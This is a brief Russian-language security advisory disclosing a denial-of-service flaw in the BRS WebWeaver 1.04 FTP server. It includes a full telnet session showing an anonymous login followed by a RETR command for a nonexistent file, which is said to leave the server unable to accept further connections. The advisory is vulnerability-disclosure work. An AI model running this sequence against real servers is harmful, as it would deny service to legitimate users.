Уязвимость обнаружена в BRS WebWeaver. Удаленный авторизованный пользователь, включая анонимного пользователя, может заблокировать работу FTP сервера.
Уязвимость происходит при попытке обращения к несуществующему объекту при помощи команды
RETR.
Пример:
e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.
RETR blah
150 Opening data connection for blah.
Затем, закрываем telnet сеанс с webweave'ом и пытаемся подключиться к серверу при помощи программы ftp.
e@some_box$ ftp hostname
Connection with hostname
Это все. Сервер заблокирован. Никто не сможет зайти на ftp сервер.
Уязвимость обнаружена в BRS WebWeaver 1.04.